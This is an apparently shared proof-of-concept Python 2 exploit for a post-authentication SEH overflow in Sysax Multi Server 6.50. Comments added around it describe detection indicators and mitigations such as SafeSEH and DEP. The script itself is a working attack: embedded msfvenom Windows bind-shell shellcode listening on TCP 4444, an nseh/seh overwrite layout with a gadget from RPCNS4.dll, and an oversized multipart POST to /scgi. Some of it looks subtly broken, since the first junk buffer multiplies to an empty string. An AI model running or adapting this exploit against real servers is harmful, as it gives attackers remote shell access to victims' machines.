emS-St1ks

Sysax multi server 6.50 better version

Apr 6th, 2016
# Proof-of-concept for a Sysax Multi Server 6.50 overflow (Python 2: uses httplib).
# Defensive reading of what the script visibly does: holding a valid logged-in
# session id, it sends ONE HTTP POST to /scgi?sid=<sid>&pid=dltslctd_name1.htm
# whose "folder_" form value is oversized and overwrites a structured exception
# handler record (nseh/seh below), landing in a bind-shell payload. Because a
# valid sid is required, the issue is post-authentication. Since the whole attack
# is a single request, the request shape (very large multipart POST to /scgi with
# pid=dltslctd_name1) is what to log and alert on; patching the server, and
# SafeSEH/DEP on the process, are the mitigations for this handler-overwrite class.
import httplib

target = 'webbackup'  # hostname of the server under test
port = 80
sid = '57e546cb7204b60f0111523409e49bdb16692ab5' #retrieved from browser URL after login
#example: http://hostname/scgi?sid=57e546cb7204b60f0111523409e49bdb16692ab5&pid=dltslctd_name1.htm

#msfvenom -p windows/shell_bind_tcp LPORT=4444 --platform windows -a x86 -f c -b "\x00\x0a"

# Payload bytes produced by the msfvenom command above. It is a bind shell, so a
# successful run leaves the host listening on TCP 4444 -- a host/network
# indicator worth monitoring for.
shell=("\x6a\x52\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd7\xae"
"\x73\xe9\x83\xeb\xfc\xe2\xf4\x2b\x46\xf1\xe9\xd7\xae\x13\x60"
"\x32\x9f\xb3\x8d\x5c\xfe\x43\x62\x85\xa2\xf8\xbb\xc3\x25\x01"
"\xc1\xd8\x19\x39\xcf\xe6\x51\xdf\xd5\xb6\xd2\x71\xc5\xf7\x6f"
"\xbc\xe4\xd6\x69\x91\x1b\x85\xf9\xf8\xbb\xc7\x25\x39\xd5\x5c"
"\xe2\x62\x91\x34\xe6\x72\x38\x86\x25\x2a\xc9\xd6\x7d\xf8\xa0"
"\xcf\x4d\x49\xa0\x5c\x9a\xf8\xe8\x01\x9f\x8c\x45\x16\x61\x7e"
"\xe8\x10\x96\x93\x9c\x21\xad\x0e\x11\xec\xd3\x57\x9c\x33\xf6"
"\xf8\xb1\xf3\xaf\xa0\x8f\x5c\xa2\x38\x62\x8f\xb2\x72\x3a\x5c"
"\xaa\xf8\xe8\x07\x27\x37\xcd\xf3\xf5\x28\x88\x8e\xf4\x22\x16"
"\x37\xf1\x2c\xb3\x5c\xbc\x98\x64\x8a\xc6\x40\xdb\xd7\xae\x1b"
"\x9e\xa4\x9c\x2c\xbd\xbf\xe2\x04\xcf\xd0\x51\xa6\x51\x47\xaf"
"\x73\xe9\xfe\x6a\x27\xb9\xbf\x87\xf3\x82\xd7\x51\xa6\x83\xdf"
"\xf7\x23\x0b\x2a\xee\x23\xa9\x87\xc6\x99\xe6\x08\x4e\x8c\x3c"
"\x40\xc6\x71\xe9\xc6\xf2\xfa\x0f\xbd\xbe\x25\xbe\xbf\x6c\xa8"
"\xde\xb0\x51\xa6\xbe\xbf\x19\x9a\xd1\x28\x51\xa6\xbe\xbf\xda"
"\x9f\xd2\x36\x51\xa6\xbe\x40\xc6\x06\x87\x9a\xcf\x8c\x3c\xbf"
"\xcd\x1e\x8d\xd7\x27\x90\xbe\x80\xf9\x42\x1f\xbd\xbc\x2a\xbf"
"\x35\x53\x15\x2e\x93\x8a\x4f\xe8\xd6\x23\x37\xcd\xc7\x68\x73"
"\xad\x83\xfe\x25\xbf\x81\xe8\x25\xa7\x81\xf8\x20\xbf\xbf\xd7"
"\xbf\xd6\x51\x51\xa6\x60\x37\xe0\x25\xaf\x28\x9e\x1b\xe1\x50"
"\xb3\x13\x16\x02\x15\x83\x5c\x75\xf8\x1b\x4f\x42\x13\xee\x16"
"\x02\x92\x75\x95\xdd\x2e\x88\x09\xa2\xab\xc8\xae\xc4\xdc\x1c"
"\x83\xd7\xfd\x8c\x3c")

# Overflow layout. The seh gadget is taken from RPCNS4.dll (per its comment),
# presumably a module loaded without SafeSEH -- enabling SafeSEH/DEP for the
# process is what breaks this handler-overwrite technique, independent of the
# application patch.
arg="folder_" #can also be changed to file_ if user has file delete permissions
pid="dltslctd_name1" #Can be changed, though padding will needed to be updated as well
junk1="A"*26401*00 #Initial pile of junk
noppad="\x95"*296 #Place to land from our long jump and before our shellcode
junkfill="\x90"*(768-len(shell)) #Fill in after our shellcode till nseh
nseh="\xeb\x06\x90\x90" #Short jump over SEH
seh="\xd7\x2a\x92\x5c" #pop esi # pop edi # ret RPCNS4.dll
jump="\xe9\x13\xfc\xff\xff" #jump back 1000 bytes for plenty of room for your shellcode
junk2="D"*9500 #Junk at the end


# The complete oversized form value, assembled in the order listed above.
buff=(arg+junk1+noppad+shell+junkfill+nseh+seh+jump+junk2)


# NOTE(review): `head` is passed to conn.request() below as the request BODY, so
# these header-looking lines and the multipart boundary travel inside the POST
# body rather than as real HTTP headers (httplib adds its own Host and
# Content-Length). The declared "Content-Length: 1337" and the two boundary
# strings (20908311357425 vs 217830224120) match neither each other nor the
# real body size -- useful tells when writing a detection rule for this request.
head = "Host: Wee! \r\n"
head += "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0\r\n"
head += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
head += "Accept-Language: en-us,en;q=0.5\r\n"
head += "Accept-Encoding: gzip, deflate\r\n"
head += "Referer: http://gotcha/scgi?sid="+sid+"&pid="+pid+".htm\r\n"
head += "Proxy-Connection: keep-alive\r\n"
head += "Content-Type: multipart/form-data; boundary=---------------------------20908311357425\r\n"
head += "Content-Length: 1337\r\n"
head += "If-Modified-Since: *\r\n"
head += "\r\n"
head += "-----------------------------217830224120\r\n"
head += "\r\n"
head += "\r\n"
head += "\r\n"
head += buff

# Single authenticated POST (sid in the query string); the response is never
# read, so the script gives no feedback of its own -- the observable outcome on
# the target is the crash and, if the payload runs, the listener on TCP 4444.
conn = httplib.HTTPConnection(target,port)
conn.request("POST", "/scgi?sid="+sid+"&pid="+pid+".htm", head)